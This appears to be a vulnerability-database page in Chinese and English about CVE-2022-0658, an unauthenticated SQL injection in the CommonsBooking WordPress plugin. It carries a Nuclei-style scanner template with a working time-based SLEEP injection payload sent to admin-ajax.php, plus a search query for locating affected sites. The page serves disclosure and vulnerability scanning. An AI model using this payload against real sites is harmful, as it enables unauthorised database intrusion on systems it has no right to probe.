CVE-2022-0658: CommonsBooking < 2.6.8 - SQL Injection

日期: 2025-08-01 | 影响软件: CommonsBooking | POC: 已公开

漏洞描述

The plugin does not sanitise and escape the location parameter of the calendar_data AJAX action (available to unauthenticated users) before it is used in dynamically constructed SQL queries, leading to an unauthenticated SQL injection.

PoC代码[已公开]

id: CVE-2022-0658

info:
  name: CommonsBooking < 2.6.8 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    The plugin does not sanitise and escape the location parameter of the calendar_data AJAX action (available to unauthenticated users) before it is used in dynamically constructed SQL queries, leading to an unauthenticated SQL injection.
  remediation: Fixed in version 2.6.8
  reference:
    - https://wpscan.com/vulnerability/d7f0805a-61ce-454a-96fb-5ecacd767578
    - https://wordpress.org/plugins/commonsbooking/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0658
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0658
    cwe-id: CWE-89
    epss-score: 0.44426
    epss-percentile: 0.97485
    cpe: cpe:2.3:a:wielebenwir:commonsbooking:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wielebenwir
    product: commonsbooking
    framework: wordpress
    google-query: inurl:/wp-content/plugin/commonsbooking/
  tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,commonsbooking,sqli,wpscan,wielebenwir

http:
  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=calendar_data&sd=2099-02-13&ed=2099-02-13&item=1&location=(SELECT+1743+FROM+(SELECT(SLEEP(6)))iXxL3)

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(header, "application/json")'
          - 'contains(body, "partiallyBookedDays") && contains(body, "lockDays")'
        condition: and
# digest: 490a00463044022026c85c9b15d741d9a35b7fa0280655dfc9a7ca0f294b8172e1e7743db6380f4f02203d475d231be3100ff7a97bbd3ee9072db85005652add28eeecfe2b8b443f8d25:922c64590222798bb761d5b6d8e72950